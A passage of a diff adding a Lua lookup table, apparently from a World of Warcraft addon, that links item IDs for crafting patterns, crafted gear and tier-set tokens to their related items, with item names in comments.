+ 32573, -- Dawnsteel Shoulders + }, + -- Pattern: Bracers of Renewed Life + ["32744"] = { + 32582, -- Bracers of Renewed Life + }, + -- Pattern: Shoulderpads of Renewed Life + ["32745"] = { + 32583, -- Shoulderpads of Renewed Life + }, + -- Pattern: Swiftstrike Bracers + ["32746"] = { + 32580, -- Swiftstrike Bracers + }, + -- Pattern: Swiftstrike Shoulders + ["32747"] = { + 32581, -- Swiftstrike Shoulders + }, + -- Pattern: Bindings of Lightning Reflexes + ["32748"] = { + 32574, -- Bindings of Lightning Reflexes + }, + -- Pattern: Shoulders of Lightning Reflexes + ["32749"] = { + 32575, -- Shoulders of Lightning Reflexes + }, + -- Pattern: Living Earth Bindings + ["32750"] = { + 32577, -- Living Earth Bindings + }, + -- Pattern: Living Earth Shoulders + ["32751"] = { + 32579, -- Living Earth Shoulders + }, + -- Pattern: Swiftheal Wraps + ["32752"] = { + 32584, -- Swiftheal Wraps + }, + -- Pattern: Swiftheal Mantle + ["32753"] = { + 32585, -- Swiftheal Mantle + }, + -- Pattern: Bracers of Nimble Thought + ["32754"] = { + 32586, -- Bracers of Nimble Thought + }, + -- Pattern: Mantle of Nimble Thought + ["32755"] = { + 32587, -- Mantle of Nimble Thought + }, + -- Legplates of the Holy Juggernaut + ["34167"] = { + 34382, -- Judicator's Legguards + }, + -- Breeches of Natural Aggression + ["34169"] = { + 34384, -- Breeches of Natural Splendor + }, + -- Pantaloons of Calming Strife + ["34170"] = { + 34386, -- Pantaloons of Growing Strife + }, + -- Felfury Legplates + ["34180"] = { + 34381, -- Felstrength Legplates + }, + -- Chain Links of the Tumultuous Storm + ["34186"] = { + 34383, -- Kilt of Spiritual Reconstruction + }, + -- Leggings of the Immortal Night + ["34188"] = { + 34385, -- Leggings of the Immortal Beast + }, + -- Pauldrons of Perseverance + ["34192"] = { + 34388, -- Pauldrons of Berserking + }, + -- Spaulders of the Thalassian Savior + ["34193"] = { + 34389, -- Spaulders of the Thalassian Defender + }, + -- Shoulderpads of Vehemence + ["34195"] = { + 34392, -- Demontooth Shoulderpads + }, + -- Shawl of Wonderment + ["34202"] = { + 34393, -- Shoulderpads of Knowledge's Pursuit + }, + -- Equilibrium Epaulets + ["34208"] = { + 34390, -- Erupting Epaulets + }, + -- Spaulders of Reclamation + ["34209"] = { + 34391, -- Spaulders of Devastation + }, + -- Harness of Carnal Instinct + ["34211"] = { + 34397, -- Bladed Chaos Tunic + }, + -- Sunglow Vest + ["34212"] = { + 34398, -- Utopian Tunic of Elune + }, + -- Warharness of Reckless Fury + ["34215"] = { + 34394, -- Breastplate of Agony's Aversion + }, + -- Heroic Judicator's Chestguard + ["34216"] = { + 34395, -- Noble Judicator's Chestguard + }, + -- Garments of Serene Shores + ["34229"] = { + 34396, -- Garments of Crashing Shores + }, + -- Robes of Faltered Light + ["34233"] = { + 34399, -- Robes of Ghostly Hatred + }, + -- Shadowed Gauntlets of Paroxysm + ["34234"] = { + 34408, -- Gloves of the Forest Drifter + }, + -- Helm of Burning Righteousness + ["34243"] = { + 34401, -- Helm of Uther's Resolve + }, + -- Duplicitous Guise + ["34244"] = { + 34404, -- Mask of the Fury Hunter + }, + -- Cover of Ursol the Wise + ["34245"] = { + 34403, -- Cover of Ursoc the Mighty + }, + -- Cowl of Gul'dan + ["34332"] = { + 34402, -- Shroud of Chieftain Ner'zhul + }, + -- Cowl of Light's Purity + ["34339"] = { + 34405, -- Helm of Arcane Purity + }, + -- Handguards of the Dawn + ["34342"] = { + 34406, -- Gloves of Tyri's Power + }, + -- Crown of Anasterian + ["34345"] = { + 34400, -- Crown of Dath'Remar + }, + -- Gauntlets of the Ancient Shadowmoon + ["34350"] = { + 34409, -- Gauntlets of the Ancient Frostwolf + }, + -- Tranquil Majesty Wraps + ["34351"] = { + 34407, -- Tranquil Moonlight Wraps + }, + -- Mayhem Projection Goggles + ["34354"] = { + 35195, -- Schematic: Mayhem Projection Goggles + }, + -- Lightning Etched Specs + ["34355"] = { + 35193, -- Schematic: Lightning Etched Specs + }, + -- Surestrike Goggles v3.0 + ["34356"] = { + 35194, -- Schematic: Surestrike Goggles v3.0 + }, + -- Hard Khorium Goggles + ["34357"] = { + 35196, -- Schematic: Hard Khorium Goggles + }, + -- Sunfire Robe + ["34364"] = { + 35206, -- Pattern: Sunfire Robe + }, + -- Robe of Eternal Light + ["34365"] = { + 35207, -- Pattern: Robe of Eternal Light + }, + -- Sunfire Handwraps + ["34366"] = { + 35204, -- Pattern: Sunfire Handwraps + }, + -- Hands of Eternal Light + ["34367"] = { + 35205, -- Pattern: Hands of Eternal Light + }, + -- Carapace of Sun and Shadow + ["34369"] = { + 35218, -- Pattern: Carapace of Sun and Shadow + }, + -- Gloves of Immortal Dusk + ["34370"] = { + 35214, -- Pattern: Gloves of Immortal Dusk + }, + -- Leather Chestguard of the Sun + ["34371"] = { + 35216, -- Pattern: Leather Chestguard of the Sun + }, + -- Leather Gauntlets of the Sun + ["34372"] = { + 35212, -- Pattern: Leather Gauntlets of the Sun + }, + -- Embrace of the Phoenix + ["34373"] = { + 35217, -- Pattern: Embrace of the Phoenix + }, + -- Fletcher's Gloves of the Phoenix + ["34374"] = { + 35213, -- Pattern: Fletcher's Gloves of the Phoenix + }, + -- Sun-Drenched Scale Chestguard + ["34375"] = { + 35219, -- Pattern: Sun-Drenched Scale Chestguard + }, + -- Sun-Drenched Scale Gloves + ["34376"] = { + 35215, -- Pattern: Sun-Drenched Scale Gloves + }, + -- Hard Khorium Battleplate + ["34377"] = { + 35211, -- Plans: Hard Khorium Battleplate + }, + -- Hard Khorium Battlefists + ["34378"] = { + 35209, -- Plans: Hard Khorium Battlefists + }, + -- Sunblessed Breastplate + ["34379"] = { + 35210, -- Plans: Sunblessed Breastplate + }, + -- Sunblessed Gauntlets + ["34380"] = { + 35208, -- Plans: Sunblessed Gauntlets + }, + -- Felstrength Legplates + ["34381"] = { + 34180, -- Felfury Legplates + }, + -- Judicator's Legguards + ["34382"] = { + 34167, -- Legplates of the Holy Juggernaut + }, + -- Kilt of Spiritual Reconstruction + ["34383"] = { + 34186, -- Chain Links of the Tumultuous Storm + }, + -- Breeches of Natural Splendor + ["34384"] = { + 34169, -- Breeches of Natural Aggression + }, + -- Leggings of the Immortal Beast + ["34385"] = { + 34188, -- Leggings of the Immortal Night + }, + -- Pantaloons of Growing Strife + ["34386"] = { + 34170, -- Pantaloons of Calming Strife + }, + -- Pauldrons of Berserking + ["34388"] = { + 34192, -- Pauldrons of Perseverance + }, + -- Spaulders of the Thalassian Defender + ["34389"] = { + 34193, -- Spaulders of the Thalassian Savior + }, + -- Erupting Epaulets + ["34390"] = { + 34208, -- Equilibrium Epaulets + }, + -- Spaulders of Devastation + ["34391"] = { + 34209, -- Spaulders of Reclamation + }, + -- Demontooth Shoulderpads + ["34392"] = { + 34195, -- Shoulderpads of Vehemence + }, + -- Shoulderpads of Knowledge's Pursuit + ["34393"] = { + 34202, -- Shawl of Wonderment + }, + -- Breastplate of Agony's Aversion + ["34394"] = { + 34215, -- Warharness of Reckless Fury + }, + -- Noble Judicator's Chestguard + ["34395"] = { + 34216, -- Heroic Judicator's Chestguard + }, + -- Garments of Crashing Shores + ["34396"] = { + 34229, -- Garments of Serene Shores + }, + -- Bladed Chaos Tunic + ["34397"] = { + 34211, -- Harness of Carnal Instinct + }, + -- Utopian Tunic of Elune + ["34398"] = { + 34212, -- Sunglow Vest + }, + -- Robes of Ghostly Hatred + ["34399"] = { + 34233, -- Robes of Faltered Light + }, + -- Crown of Dath'Remar + ["34400"] = { + 34345, -- Crown of Anasterian + }, + -- Helm of Uther's Resolve + ["34401"] = { + 34243, -- Helm of Burning Righteousness + }, + -- Shroud of Chieftain Ner'zhul + ["34402"] = { + 34332, -- Cowl of Gul'dan + }, + -- Cover of Ursoc the Mighty + ["34403"] = { + 34245, -- Cover of Ursol the Wise + }, + -- Mask of the Fury Hunter + ["34404"] = { + 34244, -- Duplicitous Guise + }, + -- Helm of Arcane Purity + ["34405"] = { + 34339, -- Cowl of Light's Purity + }, + -- Gloves of Tyri's Power + ["34406"] = { + 34342, -- Handguards of the Dawn + }, + -- Tranquil Moonlight Wraps + ["34407"] = { + 34351, -- Tranquil Majesty Wraps + }, + -- Gloves of the Forest Drifter + ["34408"] = { + 34234, -- Shadowed Gauntlets of Paroxysm + }, + -- Gauntlets of the Ancient Frostwolf + ["34409"] = { + 34350, -- Gauntlets of the Ancient Shadowmoon + }, + -- Lightbringer Bands + ["34431"] = { + 34848, -- Bracers of the Forgotten Conqueror + }, + -- Lightbringer Bracers + ["34432"] = { + 34848, -- Bracers of the Forgotten Conqueror + }, + -- Lightbringer Wristguards + ["34433"] = { + 34848, -- Bracers of the Forgotten Conqueror + }, + -- Bracers of Absolution + ["34434"] = { + 34848, -- Bracers of the Forgotten Conqueror + }, + -- Cuffs of Absolution + ["34435"] = { + 34848, -- Bracers of the Forgotten Conqueror + }, + -- Bracers of the Malefic + ["34436"] = { + 34848, -- Bracers of the Forgotten Conqueror + }, + -- Skyshatter Bands + ["34437"] = { + 34851, -- Bracers of the Forgotten Protector + }, + -- Skyshatter Bracers + ["34438"] = { + 34851, -- Bracers of the Forgotten Protector + }, + -- Skyshatter Wristguards + ["34439"] = { + 34851, -- Bracers of the Forgotten Protector + }, + -- Onslaught Bracers + ["34441"] = { + 34851, -- Bracers of the Forgotten Protector + }, + -- Onslaught Wristguards + ["34442"] = { + 34851, -- Bracers of the Forgotten Protector + }, + -- Gronnstalker's Bracers + ["34443"] = { + 34851, -- Bracers of the Forgotten Protector + }, + -- Thunderheart Wristguards + ["34444"] = { + 34852, -- Bracers of the Forgotten Vanquisher + }, + -- Thunderheart Bracers + ["34445"] = { + 34852, -- Bracers of the Forgotten Vanquisher + }, + -- Thunderheart Bands + ["34446"] = { + 34852, -- Bracers of the Forgotten Vanquisher + }, + -- Bracers of the Tempest + ["34447"] = { + 34852, -- Bracers of the Forgotten Vanquisher + }, + -- Slayer's Bracers + ["34448"] = { + 34852, -- Bracers of the Forgotten Vanquisher + }, + -- Lightbringer Girdle + ["34485"] = { + 34853, -- Belt of the Forgotten Conqueror + }, + -- Lightbringer Belt + ["34487"] = { + 34853, -- Belt of the Forgotten Conqueror + }, + -- Lightbringer Waistguard + ["34488"] = { + 34853, -- Belt of the Forgotten Conqueror + }, + -- Belt of Absolution + ["34527"] = { + 34853, -- Belt of the Forgotten Conqueror + }, + -- Cord of Absolution + ["34528"] = { + 34853, -- Belt of the Forgotten Conqueror + }, + -- Belt of the Malefic + ["34541"] = { + 34853, -- Belt of the Forgotten Conqueror + }, + -- Skyshatter Cord + ["34542"] = { + 34854, -- Belt of the Forgotten Protector + }, + -- Skyshatter Belt + ["34543"] = { + 34854, -- Belt of the Forgotten Protector + }, + -- Skyshatter Girdle + ["34545"] = { + 34854, -- Belt of the Forgotten Protector + }, + -- Onslaught Belt + ["34546"] = { + 34854, -- Belt of the Forgotten Protector + }, + -- Onslaught Waistguard + ["34547"] = { + 34854, -- Belt of the Forgotten Protector + }, + -- Gronnstalker's Belt + ["34549"] = { + 34854, -- Belt of the Forgotten Protector + }, + -- Thunderheart Belt + ["34554"] = { + 34855, -- Belt of the Forgotten Vanquisher + }, + -- Thunderheart Cord + ["34555"] = { + 34855, -- Belt of the Forgotten Vanquisher + }, + -- Thunderheart Waistguard + ["34556"] = { + 34855, -- Belt of the Forgotten Vanquisher + }, + -- Belt of the Tempest + ["34557"] = { + 34855, -- Belt of the Forgotten Vanquisher + }, + -- Slayer's Belt + ["34558"] = { + 34855, -- Belt of the Forgotten Vanquisher + }, + -- Lightbringer Treads + ["34559"] = { + 34856, -- Boots of the Forgotten Conqueror + }, + -- Lightbringer Stompers + ["34560"] = { + 34856, -- Boots of the Forgotten Conqueror + }, + -- Lightbringer Boots + ["34561"] = { + 34856, -- Boots of the Forgotten Conqueror + }, + -- Boots of Absolution + ["34562"] = { + 34856, -- Boots of the Forgotten Conqueror + }, + -- Treads of Absolution + ["34563"] = { + 34856, -- Boots of the Forgotten Conqueror + }, + -- Boots of the Malefic + ["34564"] = { + 34856, -- Boots of the Forgotten Conqueror + }, + -- Skyshatter Boots + ["34565"] = { + 34857, -- Boots of the Forgotten Protector + }, + -- Skyshatter Treads + ["34566"] = { + 34857, -- Boots of the Forgotten Protector + }, + -- Skyshatter Greaves + ["34567"] = { + 34857, -- Boots of the Forgotten Protector + }, + -- Onslaught Boots + ["34568"] = { + 34857, -- Boots of the Forgotten Protector + }, + -- Onslaught Treads + ["34569"] = { + 34857, -- Boots of the Forgotten Protector + }, + -- Gronnstalker's Boots + ["34570"] = { + 34857, -- Boots of the Forgotten Protector + }, + -- Thunderheart Boots + ["34571"] = { + 34858, -- Boots of the Forgotten Vanquisher + }, + -- Thunderheart Footwraps + ["34572"] = { + 34858, -- Boots of the Forgotten Vanquisher + }, + -- Thunderheart Treads + ["34573"] = { + 34858, -- Boots of the Forgotten Vanquisher + }, + -- Boots of the Tempest + ["34574"] = { + 34858, -- Boots of the Forgotten Vanquisher + }, + -- Slayer's Boots + ["34575"] = { + 34858, -- Boots of the Forgotten Vanquisher + }, + -- Annihilator Holo-Gogs + ["34847"] = { + 35186, -- Schematic: Annihilator Holo-Gogs + }, + -- Bracers of the Forgotten Conqueror + ["34848"] = { + 34431, -- Lightbringer Bands + 34432, -- Lightbringer Bracers + 34433, -- Lightbringer Wristguards + 34434, -- Bracers of Absolution + 34435, -- Cuffs of Absolution + 34436, -- Bracers of the Malefic + }, + -- Bracers of the Forgotten Protector + ["34851"] = { + 34437, -- Skyshatter Bands + 34438, -- Skyshatter Bracers + 34439, -- Skyshatter Wristguards + 34441, -- Onslaught Bracers + 34442, -- Onslaught Wristguards + 34443, -- Gronnstalker's Bracers + }, + -- Bracers of the Forgotten Vanquisher + ["34852"] = { + 34444, -- Thunderheart Wristguards + 34445, -- Thunderheart Bracers + 34446, -- Thunderheart Bands + 34447, -- Bracers of the Tempest + 34448, -- Slayer's Bracers + }, + -- Belt of the Forgotten Conqueror + ["34853"] = { + 34485, -- Lightbringer Girdle + 34487, -- Lightbringer Belt + 34488, -- Lightbringer Waistguard + 34527, -- Belt of Absolution + 34528, -- Cord of Absolution + 34541, -- Belt of the Malefic + }, + -- Belt of the Forgotten Protector + ["34854"] = { + 34542, -- Skyshatter Cord + 34543, -- Skyshatter Belt + 34545, -- Skyshatter Girdle + 34546, -- Onslaught Belt + 34547, -- Onslaught Waistguard + 34549, -- Gronnstalker's Belt + }, + -- Belt of the Forgotten Vanquisher + ["34855"] = { + 34554, -- Thunderheart Belt + 34555, -- Thunderheart Cord + 34556, -- Thunderheart Waistguard + 34557, -- Belt of the Tempest + 34558, -- Slayer's Belt + }, + -- Boots of the Forgotten Conqueror + ["34856"] = { + 34559, -- Lightbringer Treads + 34560, -- Lightbringer Stompers + 34561, -- Lightbringer Boots + 34562, -- Boots of Absolution + 34563, -- Treads of Absolution + 34564, -- Boots of the Malefic + }, + -- Boots of the Forgotten Protector + ["34857"] = { + 34565, -- Skyshatter Boots + 34566, -- Skyshatter Treads + 34567, -- Skyshatter Greaves + 34568, -- Onslaught Boots + 34569, -- Onslaught Treads + 34570, -- Gronnstalker's Boots + }, + -- Boots of the Forgotten Vanquisher + ["34858"] = { + 34571, -- Thunderheart Boots + 34572, -- Thunderheart Footwraps + 34573, -- Thunderheart Treads + 34574, -- Boots of the Tempest + 34575, -- Slayer's Boots + }, + -- Powerheal 9000 Lens + ["35181"] = { + 35189, -- Schematic: Powerheal 9000 Lens + }, + -- Hyper-Magnified Moon Specs + ["35182"] = { + 35190, -- Schematic: Hyper-Magnified Moon Specs + }, + -- Primal-Attuned Goggles + ["35184"] = { + 35192, -- Schematic: Primal-Attuned Goggles + }, + -- Schematic: Annihilator Holo-Gogs + ["35186"] = { + 34847, -- Annihilator Holo-Gogs + }, + -- Schematic: Powerheal 9000 Lens + ["35189"] = { + 35181, -- Powerheal 9000 Lens + }, + -- Schematic: Hyper-Magnified Moon Specs + ["35190"] = { + 35182, -- Hyper-Magnified Moon Specs + }, + -- Schematic: Primal-Attuned Goggles + ["35192"] = { + 35184, -- Primal-Attuned Goggles + }, + -- Schematic: Lightning Etched Specs + ["35193"] = { + 34355, -- Lightning Etched Specs + }, + -- Schematic: Surestrike Goggles v3.0 + ["35194"] = { + 34356, -- Surestrike Goggles v3.0 + }, + -- Schematic: Mayhem Projection Goggles + ["35195"] = { + 34354, -- Mayhem Projection Goggles + }, + -- Schematic: Hard Khorium Goggles + ["35196"] = { + 34357, -- Hard Khorium Goggles + }, + -- Pattern: Sunfire Handwraps + ["35204"] = { + 34366, -- Sunfire Handwraps + }, + -- Pattern: Hands of Eternal Light + ["35205"] = { + 34367, -- Hands of Eternal Light + }, + -- Pattern: Sunfire Robe + ["35206"] = { + 34364, -- Sunfire Robe + }, + -- Pattern: Robe of Eternal Light + ["35207"] = { + 34365, -- Robe of Eternal Light + }, + -- Plans: Sunblessed Gauntlets + ["35208"] = { + 34380, -- Sunblessed Gauntlets + }, + -- Plans: Hard Khorium Battlefists + ["35209"] = { + 34378, -- Hard Khorium Battlefists + }, + -- Plans: Sunblessed Breastplate + ["35210"] = { + 34379, -- Sunblessed Breastplate + }, + -- Plans: Hard Khorium Battleplate + ["35211"] = { + 34377, -- Hard Khorium Battleplate + }, + -- Pattern: Leather Gauntlets of the Sun + ["35212"] = { + 34372, -- Leather Gauntlets of the Sun + }, + -- Pattern: Fletcher's Gloves of the Phoenix + ["35213"] = { + 34374, -- Fletcher's Gloves of the Phoenix + }, + -- Pattern: Gloves of Immortal Dusk + ["35214"] = { + 34370, -- Gloves of Immortal Dusk + }, + -- Pattern: Sun-Drenched Scale Gloves + ["35215"] = { + 34376, -- Sun-Drenched Scale Gloves + }, + -- Pattern: Leather Chestguard of the Sun + ["35216"] = { + 34371, -- Leather Chestguard of the Sun + }, + -- Pattern: Embrace of the Phoenix + ["35217"] = { + 34373, -- Embrace of the Phoenix + }, + -- Pattern: Carapace of Sun and Shadow + ["35218"] = { + 34369, -- Carapace of Sun and Shadow + }, + -- Pattern: Sun-Drenched Scale Chestguard + ["35219"] = { + 34375, -- Sun-Drenched Scale Chestguard + }, + -- Heroes' Frostfire Circlet + ["39491"] = { + 40618, -- Helm of the Lost Vanquisher + }, + -- Heroes' Frostfire Robe + ["39492"] = { + 40612, -- Chestguard of the Lost Vanquisher + }, + -- Heroes' Frostfire Leggings + ["39493"] = { + 40621, -- Leggings of the Lost Vanquisher + }, + -- Heroes' Frostfire Shoulderpads + ["39494"] = { + 40624, -- Spaulders of the Lost Vanquisher + }, + -- Heroes' Frostfire Gloves + ["39495"] = { + 40615, -- Gloves of the Lost Vanquisher + }, + -- Heroes' Plagueheart Circlet + ["39496"] = { + 40616, -- Helm of the Lost Conqueror + }, + -- Heroes' Plagueheart Robe + ["39497"] = { + 40610, -- Chestguard of the Lost Conqueror + }, + -- Heroes' Plagueheart Leggings + ["39498"] = { + 40619, -- Leggings of the Lost Conqueror + }, + -- Heroes' Plagueheart Shoulderpads + ["39499"] = { + 40622, -- Spaulders of the Lost Conqueror + }, + -- Heroes' Plagueheart Gloves + ["39500"] = { + 40613, -- Gloves of the Lost Conqueror + }, + -- Heroes' Crown of Faith + ["39514"] = { + 40616, -- Helm of the Lost Conqueror + }, + -- Heroes' Robe of Faith + ["39515"] = { + 40610, -- Chestguard of the Lost Conqueror + }, + -- Heroes' Leggings of Faith + ["39517"] = { + 40619, -- Leggings of the Lost Conqueror + }, + -- Heroes' Shoulderpads of Faith + ["39518"] = { + 40622, -- Spaulders of the Lost Conqueror + }, + -- Heroes' Gloves of Faith + ["39519"] = { + 40613, -- Gloves of the Lost Conqueror + }, + -- Heroes' Circlet of Faith + ["39521"] = { + 40616, -- Helm of the Lost Conqueror + }, + -- Heroes' Raiments of Faith + ["39523"] = { + 40610, -- Chestguard of the Lost Conqueror + }, + -- Heroes' Pants of Faith + ["39528"] = { + 40619, -- Leggings of the Lost Conqueror + }, + -- Heroes' Mantle of Faith + ["39529"] = { + 40622, -- Spaulders of the Lost Conqueror + }, + -- Heroes' Handwraps of Faith + ["39530"] = { + 40613, -- Gloves of the Lost Conqueror + }, + -- Heroes' Dreamwalker Headpiece + ["39531"] = { + 40618, -- Helm of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Robe + ["39538"] = { + 40612, -- Chestguard of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Leggings + ["39539"] = { + 40621, -- Leggings of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Spaulders + ["39542"] = { + 40624, -- Spaulders of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Handguards + ["39543"] = { + 40615, -- Gloves of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Gloves + ["39544"] = { + 40615, -- Gloves of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Cover + ["39545"] = { + 40618, -- Helm of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Trousers + ["39546"] = { + 40621, -- Leggings of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Vestments + ["39547"] = { + 40612, -- Chestguard of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Mantle + ["39548"] = { + 40624, -- Spaulders of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Headguard + ["39553"] = { + 40618, -- Helm of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Raiments + ["39554"] = { + 40612, -- Chestguard of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Legguards + ["39555"] = { + 40621, -- Leggings of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Shoulderpads + ["39556"] = { + 40624, -- Spaulders of the Lost Vanquisher + }, + -- Heroes' Dreamwalker Handgrips + ["39557"] = { + 40615, -- Gloves of the Lost Vanquisher + }, + -- Heroes' Bonescythe Breastplate + ["39558"] = { + 40612, -- Chestguard of the Lost Vanquisher + }, + -- Heroes' Bonescythe Gauntlets + ["39560"] = { + 40615, -- Gloves of the Lost Vanquisher + }, + -- Heroes' Bonescythe Helmet + ["39561"] = { + 40618, -- Helm of the Lost Vanquisher + }, + -- Heroes' Bonescythe Legplates + ["39564"] = { + 40621, -- Leggings of the Lost Vanquisher + }, + -- Heroes' Bonescythe Pauldrons + ["39565"] = { + 40624, -- Spaulders of the Lost Vanquisher + }, + -- Heroes' Cryptstalker Headpiece + ["39578"] = { + 40617, -- Helm of the Lost Protector + }, + -- Heroes' Cryptstalker Tunic + ["39579"] = { + 40611, -- Chestguard of the Lost Protector + }, + -- Heroes' Cryptstalker Legguards + ["39580"] = { + 40620, -- Leggings of the Lost Protector + }, + -- Heroes' Cryptstalker Spaulders + ["39581"] = { + 40623, -- Spaulders of the Lost Protector + }, + -- Heroes' Cryptstalker Handguards + ["39582"] = { + 40614, -- Gloves of the Lost Protector + }, + -- Heroes' Earthshatter Headpiece + ["39583"] = { + 40617, -- Helm of the Lost Protector + }, + -- Heroes' Earthshatter Tunic + ["39588"] = { + 40611, -- Chestguard of the Lost Protector + }, + -- Heroes' Earthshatter Legguards + ["39589"] = { + 40620, -- Leggings of the Lost Protector + }, + -- Heroes' Earthshatter Spaulders + ["39590"] = { + 40623, -- Spaulders of the Lost Protector + }, + -- Heroes' Earthshatter Handguards + ["39591"] = { + 40614, -- Gloves of the Lost Protector + }, + -- Heroes' Earthshatter Hauberk + ["39592"] = { + 40611, -- Chestguard of the Lost Protector + }, + -- Heroes' Earthshatter Gloves + ["39593"] = { + 40614, -- Gloves of the Lost Protector + }, + -- Heroes' Earthshatter Helm + ["39594"] = { + 40617, -- Helm of the Lost Protector + }, + -- Heroes' Earthshatter Kilt + ["39595"] = { + 40620, -- Leggings of the Lost Protector + }, + -- Heroes' Earthshatter Shoulderpads + ["39596"] = { + 40623, -- Spaulders of the Lost Protector + }, + -- Heroes' Earthshatter Chestguard + ["39597"] = { + 40611, -- Chestguard of the Lost Protector + }, + -- Heroes' Earthshatter Grips + ["39601"] = { + 40614, -- Gloves of the Lost Protector + }, + -- Heroes' Earthshatter Faceguard + ["39602"] = { + 40617, -- Helm of the Lost Protector + }, + -- Heroes' Earthshatter War-Kilt + ["39603"] = { + 40620, -- Leggings of the Lost Protector + }, + -- Heroes' Earthshatter Shoulderguards + ["39604"] = { + 40623, -- Spaulders of the Lost Protector + }, + -- Heroes' Dreadnaught Helmet + ["39605"] = { + 40617, -- Helm of the Lost Protector + }, + -- Heroes' Dreadnaught Battleplate + ["39606"] = { + 40611, -- Chestguard of the Lost Protector + }, + -- Heroes' Dreadnaught Legplates + ["39607"] = { + 40620, -- Leggings of the Lost Protector + }, + -- Heroes' Dreadnaught Shoulderplates + ["39608"] = { + 40623, -- Spaulders of the Lost Protector + }, + -- Heroes' Dreadnaught Gauntlets + ["39609"] = { + 40614, -- Gloves of the Lost Protector + }, + -- Heroes' Dreadnaught Greathelm + ["39610"] = { + 40617, -- Helm of the Lost Protector + }, + -- Heroes' Dreadnaught Breastplate + ["39611"] = { + 40611, -- Chestguard of the Lost Protector + }, + -- Heroes' Dreadnaught Legguards + ["39612"] = { + 40620, -- Leggings of the Lost Protector + }, + -- Heroes' Dreadnaught Pauldrons + ["39613"] = { + 40623, -- Spaulders of the Lost Protector + }, + -- Heroes' Scourgeborne Battleplate + ["39617"] = { + 40612, -- Chestguard of the Lost Vanquisher + }, + -- Heroes' Scourgeborne Gauntlets + ["39618"] = { + 40615, -- Gloves of the Lost Vanquisher + }, + -- Heroes' Scourgeborne Helmet + ["39619"] = { + 40618, -- Helm of the Lost Vanquisher + }, + -- Heroes' Scourgeborne Legplates + ["39620"] = { + 40621, -- Leggings of the Lost Vanquisher + }, + -- Heroes' Scourgeborne Shoulderplates + ["39621"] = { + 40624, -- Spaulders of the Lost Vanquisher + }, + -- Heroes' Dreadnaught Handguards + ["39622"] = { + 40614, -- Gloves of the Lost Protector + }, + -- Heroes' Scourgeborne Chestguard + ["39623"] = { + 40612, -- Chestguard of the Lost Vanquisher + }, + -- Heroes' Scourgeborne Handguards + ["39624"] = { + 40615, -- Gloves of the Lost Vanquisher + }, + -- Heroes' Scourgeborne Faceguard + ["39625"] = { + 40618, -- Helm of the Lost Vanquisher + }, + -- Heroes' Scourgeborne Legguards + ["39626"] = { + 40621, -- Leggings of the Lost Vanquisher + }, + -- Heroes' Scourgeborne Pauldrons + ["39627"] = { + 40624, -- Spaulders of the Lost Vanquisher + }, + -- Heroes' Redemption Headpiece + ["39628"] = { + 40616, -- Helm of the Lost Conqueror + }, + -- Heroes' Redemption Tunic + ["39629"] = { + 40610, -- Chestguard of the Lost Conqueror + }, + -- Heroes' Redemption Greaves + ["39630"] = { + 40619, -- Leggings of the Lost Conqueror + }, + -- Heroes' Redemption Spaulders + ["39631"] = { + 40622, -- Spaulders of the Lost Conqueror + }, + -- Heroes' Redemption Gloves + ["39632"] = { + 40613, -- Gloves of the Lost Conqueror + }, + -- Heroes' Redemption Chestpiece + ["39633"] = { + 40610, -- Chestguard of the Lost Conqueror + }, + -- Heroes' Redemption Gauntlets + ["39634"] = { + 40613, -- Gloves of the Lost Conqueror + }, + -- Heroes' Redemption Helm + ["39635"] = { + 40616, -- Helm of the Lost Conqueror + }, + -- Heroes' Redemption Legplates + ["39636"] = { + 40619, -- Leggings of the Lost Conqueror + }, + -- Heroes' Redemption Shoulderplates + ["39637"] = { + 40622, -- Spaulders of the Lost Conqueror + }, + -- Heroes' Redemption Breastplate + ["39638"] = { + 40610, -- Chestguard of the Lost Conqueror + }, + -- Heroes' Redemption Handguards + ["39639"] = { + 40613, -- Gloves of the Lost Conqueror + }, + -- Heroes' Redemption Faceguard + ["39640"] = { + 40616, -- Helm of the Lost Conqueror + }, + -- Heroes' Redemption Legguards + ["39641"] = { + 40619, -- Leggings of the Lost Conqueror + }, + -- Heroes' Redemption Shoulderguards + ["39642"] = { + 40622, -- Spaulders of the Lost Conqueror + }, + -- Valorous Frostfire Gloves + ["40415"] = { + 40630, -- Gauntlets of the Lost Vanquisher + }, + -- Valorous Frostfire Circlet + ["40416"] = { + 40633, -- Crown of the Lost Vanquisher + }, + -- Valorous Frostfire Leggings + ["40417"] = { + 40636, -- Legplates of the Lost Vanquisher + }, + -- Valorous Frostfire Robe + ["40418"] = { + 40627, -- Breastplate of the Lost Vanquisher + }, + -- Valorous Frostfire Shoulderpads + ["40419"] = { + 40639, -- Mantle of the Lost Vanquisher + }, + -- Valorous Plagueheart Gloves + ["40420"] = { + 40628, -- Gauntlets of the Lost Conqueror + }, + -- Valorous Plagueheart Circlet + ["40421"] = { + 40631, -- Crown of the Lost Conqueror + }, + -- Valorous Plagueheart Leggings + ["40422"] = { + 40634, -- Legplates of the Lost Conqueror + }, + -- Valorous Plagueheart Robe + ["40423"] = { + 40625, -- Breastplate of the Lost Conqueror + }, + -- Valorous Plagueheart Shoulderpads + ["40424"] = { + 40637, -- Mantle of the Lost Conqueror + }, + -- Valorous Gloves of Faith + ["40445"] = { + 40628, -- Gauntlets of the Lost Conqueror + }, + -- Valorous Crown of Faith + ["40447"] = { + 40631, -- Crown of the Lost Conqueror + }, + -- Valorous Leggings of Faith + ["40448"] = { + 40634, -- Legplates of the Lost Conqueror + }, + -- Valorous Robe of Faith + ["40449"] = { + 40625, -- Breastplate of the Lost Conqueror + }, + -- Valorous Shoulderpads of Faith + ["40450"] = { + 40637, -- Mantle of the Lost Conqueror + }, + -- Valorous Handwraps of Faith + ["40454"] = { + 40628, -- Gauntlets of the Lost Conqueror + }, + -- Valorous Circlet of Faith + ["40456"] = { + 40631, -- Crown of the Lost Conqueror + }, + -- Valorous Pants of Faith + ["40457"] = { + 40634, -- Legplates of the Lost Conqueror + }, + -- Valorous Raiments of Faith + ["40458"] = { + 